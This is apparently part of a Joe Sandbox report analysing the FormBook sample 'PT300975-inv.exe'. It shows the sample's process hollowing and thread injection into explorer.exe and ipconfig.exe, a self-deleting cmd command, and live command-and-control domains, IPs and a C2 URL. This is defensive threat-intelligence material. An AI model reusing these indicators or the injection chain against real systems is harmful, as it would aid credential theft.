          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03477E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03477E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03477E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03477E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03477E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0352AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0352AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0347766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0348AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0348AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0348AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0348AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0348AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0346C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0346C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0346C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03498E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0349A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0349A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03521608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0346E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0351FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03538ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034936CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034A8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0351FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034776E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034916E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034FFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034E46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03530EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03530EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03530EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034A3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034E3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03487D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0348C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0348C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03538D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0352E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03494D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03494D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03494D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03473D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03473D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03473D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03473D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03473D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03473D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03473D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03473D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03473D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03473D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03473D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03473D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03473D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0346AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034EA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034E6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034E6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034E6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034E6DC9 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 4_2_034E6DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 4_2_034E6DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 4_2_03518DF1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 4_2_0347D5E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 4_2_0347D5E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 4_2_0352FDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 4_2_0352FDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 4_2_0352FDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 4_2_0352FDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 4_2_03492581 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 4_2_03492581 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 4_2_03492581 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 4_2_03492581 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 4_2_03462D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 4_2_03462D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 4_2_03462D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 4_2_03462D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 4_2_03462D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 4_2_0349FD9B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 4_2_0349FD9B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 4_2_034935A1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 4_2_03491DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 4_2_03491DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 4_2_03491DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 4_2_035305AC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 4_2_035305AC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 4_2_0349A44B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 4_2_034FC450 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PT300975-inv.exe | Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\ipconfig.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\PT300975-inv.exe | Memory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe | Network Connect: 156.241.53.196 80
Source: C:\Windows\explorer.exe | Network Connect: 198.54.117.244 80
Maps a DLL or memory area into another process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Section loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Section loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\ipconfig.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\ipconfig.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Thread register set: target process: 3440
Source: C:\Windows\SysWOW64\ipconfig.exe | Thread register set: target process: 3440
Queues an APC in another process (thread injection)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Thread APC queued: target process: C:\Windows\explorer.exe
Sample uses process hollowing technique
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Section unmapped: C:\Windows\SysWOW64\ipconfig.exe base address: E30000
Source: C:\Users\user\Desktop\PT300975-inv.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
Source: C:\Windows\SysWOW64\ipconfig.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe'
Source: explorer.exe, 00000003.00000000.359794599.0000000004F80000.00000004.00000001.sdmp, ipconfig.exe, 00000004.00000002.605713889.00000000046D0000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000003.00000002.605084238.0000000000EE0000.00000002.00000001.sdmp, ipconfig.exe, 00000004.00000002.605713889.00000000046D0000.00000002.00000001.sdmp | Binary or memory string: Progman
Source: explorer.exe, 00000003.00000002.605084238.0000000000EE0000.00000002.00000001.sdmp, ipconfig.exe, 00000004.00000002.605713889.00000000046D0000.00000002.00000001.sdmp | Binary or memory string: &Program Manager
Source: explorer.exe, 00000003.00000002.605084238.0000000000EE0000.00000002.00000001.sdmp, ipconfig.exe, 00000004.00000002.605713889.00000000046D0000.00000002.00000001.sdmp | Binary or memory string: Progmanlock
Source: C:\Users\user\Desktop\PT300975-inv.exe | Queries volume information: C:\Users\user\Desktop\PT300975-inv.exe VolumeInformation
Source: C:\Users\user\Desktop\PT300975-inv.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\PT300975-inv.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\PT300975-inv.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\PT300975-inv.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Users\user\Desktop\PT300975-inv.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match | File source: 00000000.00000002.346082629.0000000004983000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.384709518.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.345935550.000000000489F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.384973697.0000000004DD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.603415993.0000000000990000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.603938511.0000000000DF0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.385166130.00000000050D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.604508928.0000000002F40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 2.2.mscorsvw.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.mscorsvw.exe.400000.0.unpack, type: UNPACKEDPE

          Remote Access Functionality:

Yara detected FormBook
Source: Yara match | File source: 00000000.00000002.346082629.0000000004983000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.384709518.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.345935550.000000000489F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.384973697.0000000004DD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.603415993.0000000000990000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.603938511.0000000000DF0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.385166130.00000000050D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.604508928.0000000002F40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 2.2.mscorsvw.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.mscorsvw.exe.400000.0.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Shared Modules 1 | Path Interception | Process Injection 512 | Rootkit 1 | Credential API Hooking 1 | Security Software Discovery 221 | Remote Services | Credential API Hooking 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Masquerading 1 | Input Capture 1 | Virtualization/Sandbox Evasion 3 | Remote Desktop Protocol | Input Capture 1 | Exfiltration Over Bluetooth | Ingress Tool Transfer 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Virtualization/Sandbox Evasion 3 | Security Account Manager | Process Discovery 2 | SMB/Windows Admin Shares | Archive Collected Data 1 | Automated Exfiltration | Non-Application Layer Protocol 2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Disable or Modify Tools 1 | NTDS | Remote System Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 2 | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Process Injection 512 | LSA Secrets | System Network Configuration Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Deobfuscate/Decode Files or Information 1 | Cached Domain Credentials | System Information Discovery 112 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | Hidden Files and Directories 1 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Obfuscated Files or Information 3 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Software Packing 1 | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction

          Behavior Graph

Behavior Graph ID: 323028 | Sample: PT300975-inv.exe | Start date: 26/11/2020 | Architecture: WINDOWS | Score: 100

Start node: DNS/IP g.msn.com; signatures: Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; Yara detected FormBook; 4 other signatures
• PT300975-inv.exe (started): dropped file C:\Users\user\...\PT300975-inv.exe.log (ASCII); signature: Hides that the sample has been downloaded from the Internet (zone.identifier)
  • mscorsvw.exe (started by PT300975-inv.exe): Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; 2 other signatures
    • explorer.exe (injected by mscorsvw.exe): www.asacal.com 156.241.53.196, 49755, 80, XIAOZHIYUN1-AS-APICIDCNETWORKUS, Seychelles; www.solidconstruct.site 198.54.117.244, 49750, 80, NAMECHEAP-NETUS, United States; 3 other IPs or domains; signature: System process connects to network (likely due to code injection or exploit)
      • ipconfig.exe (started by explorer.exe): Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
        • cmd.exe (started by ipconfig.exe)
          • conhost.exe (started by cmd.exe)


          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

Source | Detection | Scanner | Label
PT300975-inv.exe | 21% | ReversingLabs | ByteCode-MSIL.Trojan.Razy

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

Source | Detection | Scanner | Label
2.2.mscorsvw.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

          Domains

          No Antivirus matches

          URLs

Source | Detection | Scanner | Label
http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
http://www.tiro.com | 0% | URL Reputation | safe
http://www.goodfont.co.kr | 0% | URL Reputation | safe
http://www.carterandcone.coml | 0% | URL Reputation | safe
http://www.sajatypeworks.com | 0% | URL Reputation | safe
http://www.typography.netD | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
http://fontfabrik.com | 0% | URL Reputation | safe
http://www.founder.com.cn/cn | 0% | URL Reputation | safe
http://www.asacal.com/jqc/?JfEtEZgp=cE9UUOc3pLPT0LAdHSIP3evlMF3IBhbdmq5wG0CQLEBsctkiCkQzhS7S4EgmhhRecsIvRlsotA==&ojq0s=RzulsD | 0% | Avira URL Cloud | safe
http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
http://www.sandoll.co.kr | 0% | URL Reputation | safe
http://www.urwpp.deDPlease | 0% | URL Reputation | safe
http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
http://www.sakkal.com | 0% | URL Reputation | safe

          Domains and IPs

          Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.solidconstruct.site | 198.54.117.244 | true | true | | unknown
www.asacal.com | 156.241.53.196 | true | true | | unknown
www.hongreng.xyz | unknown | unknown | true | | unknown
g.msn.com | unknown | unknown | false | | high
www.kornteengoods.com | unknown | unknown | true | | unknown

                    Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://www.asacal.com/jqc/?JfEtEZgp=cE9UUOc3pLPT0LAdHSIP3evlMF3IBhbdmq5wG0CQLEBsctkiCkQzhS7S4EgmhhRecsIvRlsotA==&ojq0s=RzulsD | true | Avira URL Cloud: safe | unknown

                    URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://www.autoitscript.com/autoit3/J | explorer.exe, 00000003.00000002.604467265.000000000095C000.00000004.00000020.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0 | explorer.exe, 00000003.00000000.367422589.000000000B1A6000.00000002.00000001.sdmp | false | | high
http://www.fontbureau.com | explorer.exe, 00000003.00000000.367422589.000000000B1A6000.00000002.00000001.sdmp | false | | high
http://www.fontbureau.com/designersG | explorer.exe, 00000003.00000000.367422589.000000000B1A6000.00000002.00000001.sdmp | false | | high
http://www.fontbureau.com/designers/? | explorer.exe, 00000003.00000000.367422589.000000000B1A6000.00000002.00000001.sdmp | false | | high
http://www.founder.com.cn/cn/bThe | explorer.exe, 00000003.00000000.367422589.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers? | explorer.exe, 00000003.00000000.367422589.000000000B1A6000.00000002.00000001.sdmp | false | | high
http://www.tiro.com | explorer.exe, 00000003.00000000.367422589.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers | explorer.exe, 00000003.00000000.367422589.000000000B1A6000.00000002.00000001.sdmp | false | | high
http://www.goodfont.co.kr | explorer.exe, 00000003.00000000.367422589.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.carterandcone.coml | explorer.exe, 00000003.00000000.367422589.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.sajatypeworks.com | explorer.exe, 00000003.00000000.367422589.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.typography.netD | explorer.exe, 00000003.00000000.367422589.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/cabarga.htmlN | explorer.exe, 00000003.00000000.367422589.000000000B1A6000.00000002.00000001.sdmp | false | | high
http://www.founder.com.cn/cn/cThe | explorer.exe, 00000003.00000000.367422589.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/staff/dennis.htm | explorer.exe, 00000003.00000000.367422589.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://fontfabrik.com | explorer.exe, 00000003.00000000.367422589.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cn | explorer.exe, 00000003.00000000.367422589.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/frere-jones.html | explorer.exe, 00000003.00000000.367422589.000000000B1A6000.00000002.00000001.sdmp | false | | high
http://www.jiyu-kobo.co.jp/ | explorer.exe, 00000003.00000000.367422589.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/DPlease | explorer.exe, 00000003.00000000.367422589.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers8 | explorer.exe, 00000003.00000000.367422589.000000000B1A6000.00000002.00000001.sdmp | false | | high
http://www.fonts.com | explorer.exe, 00000003.00000000.367422589.000000000B1A6000.00000002.00000001.sdmp | false | | high
http://www.sandoll.co.kr | explorer.exe, 00000003.00000000.367422589.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.urwpp.deDPlease | explorer.exe, 00000003.00000000.367422589.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.zhongyicts.com.cn | explorer.exe, 00000003.00000000.367422589.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.sakkal.com | explorer.exe, 00000003.00000000.367422589.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown

                                          Contacted IPs


                                          Public

IP | Domain | Country | ASN | ASN Name | Malicious
156.241.53.196 | unknown | Seychelles | 136800 | XIAOZHIYUN1-AS-APICIDCNETWORKUS | true
198.54.117.244 | unknown | United States | 22612 | NAMECHEAP-NETUS | true

                                          Private

                                          IP
                                          192.168.2.1

                                          General Information

Joe Sandbox Version: 31.0.0 Red Diamond
Analysis ID: 323028
Start date: 26.11.2020
Start time: 08:27:30
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 9m 13s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: PT300975-inv.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed: 22
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winEXE@7/1@5/3
EGA Information: Failed
HDC Information:
• Successful, ratio: 37.7% (good quality ratio 34.6%)
• Quality average: 73.5%
• Quality standard deviation: 30.8%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
• Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
• Excluded IPs from analysis (whitelisted): 104.43.193.48, 13.64.90.137, 168.61.161.212, 51.104.144.132, 8.241.122.126, 67.26.139.254, 8.248.113.254, 8.253.95.249, 67.27.234.126, 51.103.5.186, 52.155.217.156, 20.54.26.129, 52.142.114.176, 92.122.213.247, 92.122.213.194, 23.210.248.85
